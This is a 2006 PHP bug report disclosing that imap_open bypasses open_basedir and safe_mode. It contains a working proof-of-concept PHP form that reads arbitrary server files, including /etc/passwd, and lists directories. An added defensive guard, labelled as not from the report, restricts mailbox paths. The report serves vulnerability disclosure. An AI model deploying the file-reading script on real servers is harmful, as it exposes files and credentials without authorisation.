ID:               37265
 Updated by:       [EMAIL PROTECTED]
 Reported By:      Challii at btinternet dot com
-Status:           Open
+Status:           Assigned
 Bug Type:         IMAP related
 Operating System: RHE3
 PHP Version:      4.4.2
-Assigned To:      
+Assigned To:      ilia
 New Comment:

Assigned to Ilia on his request.


Previous Comments:
------------------------------------------------------------------------

[2006-05-02 18:46:16] challii at btinternet dot com

The underlying system has to be able to access different files based on
the overlying system's configuration, where mailboxes are, etc.

The problem lies in the fact that imap_body doesn't adhere to the
PHP open_basedir restrictions.

------------------------------------------------------------------------

[2006-05-01 19:28:50] judas dot iscariote at gmail dot com

A PHP dev can correct me if I'm wrong, but this is not a PHP bug.

If the mail_open() function of the c-client library allows reading
arbitrary files on the server, it's not precisely a PHP problem, right?

A PHP extension can do what the underlying library API permits.

------------------------------------------------------------------------

[2006-05-01 17:02:12] Challii at btinternet dot com

Description:
------------
Vulnerability in the c-client library (tested with versions
2000, 2001, 2004): mail_open could be used to open a stream to local
files.

For PHP and the imap module:

imap_open allows bypassing safe_mode and open_basedir restrictions.
Use imap_body or others to view a file and imap_list to recursively
list a directory.

s/mailbox/file :)
imap_createmailbox
imap_deletemailbox
imap_renamemailbox
to create, delete, rename files with Apache privileges.

Reproduce code:
---------------

##### code #####

<form action="" method="post">
<select name="switch">
<option selected="selected" value="file">View file</option>
<option value="dir">View dir</option>
</select>
<input type="text" size="60" name="string">
<input type="submit" value="go">
</form>

<?php
$string = !empty($_POST['string']) ? $_POST['string'] : 0;
$switch = !empty($_POST['switch']) ? $_POST['switch'] : 0;

if ($string && $switch == "file") {
    $stream = imap_open($string, "", "");
    if ($stream == FALSE)
        die("Can't open imap stream");

    $str = imap_body($stream, 1);
    if (!empty($str))
        echo "<pre>".$str."</pre>";
    imap_close($stream);
} elseif ($string && $switch == "dir") {
    $stream = imap_open("/etc/passwd", "", "");
    if ($stream == FALSE)
        die("Can't open imap stream");

    $string = explode("|", $string);
    if (count($string) > 1)
        $dir_list = imap_list($stream, trim($string[0]), trim($string[1]));
    else
        $dir_list = imap_list($stream, trim($string[0]), "*");
    echo "<pre>";
    for ($i = 0; $i < count($dir_list); $i++)
        echo "$dir_list[$i]\n";
    echo "</pre>";
    imap_close($stream);
}
?>

################

Expected result:
----------------
That the file could not be accessed due to a security restriction.

Actual result:
--------------
The ability to see any file on the server.


------------------------------------------------------------------------
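
A defensive counterpart to the bypass described in the report above, added here as an example and not code from the report or from PHP's own fix: a userland check that applies an open_basedir-style rule to the mailbox string before it reaches imap_open(). It assumes the c-client convention that a remote mailbox starts with "{host[:port][/flags]}" and that anything else names a local file; the allowed directory list and sample paths are constructed.

```php
<?php
// Added example, not part of the bug report or of PHP's own fix: a
// userland guard that applies an open_basedir-style check to a mailbox
// string before it reaches imap_open() (the same check suits the
// reference argument of imap_list()). It assumes the c-client convention
// that a remote mailbox starts with "{host[:port][/flags]}" and that
// anything else names a local file. The allowed directories are a
// constructed sample, not a real deployment's configuration.

function mailbox_allowed(string $mailbox, array $allowed_dirs): bool
{
    // Remote spec: the host part is in braces and the remainder is a
    // mailbox name on that server, not a local path. If users may supply
    // the host, validate it against an allow-list separately.
    if ($mailbox !== '' && $mailbox[0] === '{') {
        return (bool) preg_match('/^\{[A-Za-z0-9.\-:\/=]+\}[^\x00]*$/', $mailbox);
    }

    // Local path: it must resolve, symlinks included, to a location inside
    // an allowed directory, mirroring what open_basedir enforces for fopen().
    // realpath() returns false for a path that does not exist.
    $real = realpath($mailbox);
    if ($real === false) {
        return false;
    }
    foreach ($allowed_dirs as $dir) {
        $base = realpath($dir);
        if ($base !== false && strpos($real . '/', rtrim($base, '/') . '/') === 0) {
            return true;
        }
    }
    return false;
}

function guarded_imap_open(string $mailbox, string $user, string $pass, array $allowed_dirs)
{
    if (!mailbox_allowed($mailbox, $allowed_dirs)) {
        // Refuse and log rather than let c-client open the path.
        error_log("imap_open refused: mailbox outside allowed directories: $mailbox");
        return false;
    }
    return imap_open($mailbox, $user, $pass);
}

// Constructed sample: only spools under /var/mail may be opened as local files.
$allowed = ['/var/mail'];
var_dump(mailbox_allowed('/etc/passwd', $allowed));
var_dump(mailbox_allowed('/var/mail/alice', $allowed));
var_dump(mailbox_allowed('{imap.example.com:993/imap/ssl}INBOX', $allowed));
```

The check only restricts local paths; a remote spec still lets the caller choose the host, so deployments that take the host from user input need a separate host allow-list.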


-- 
Edit this bug report at http://bugs.php.net/?id=37265&edit=1
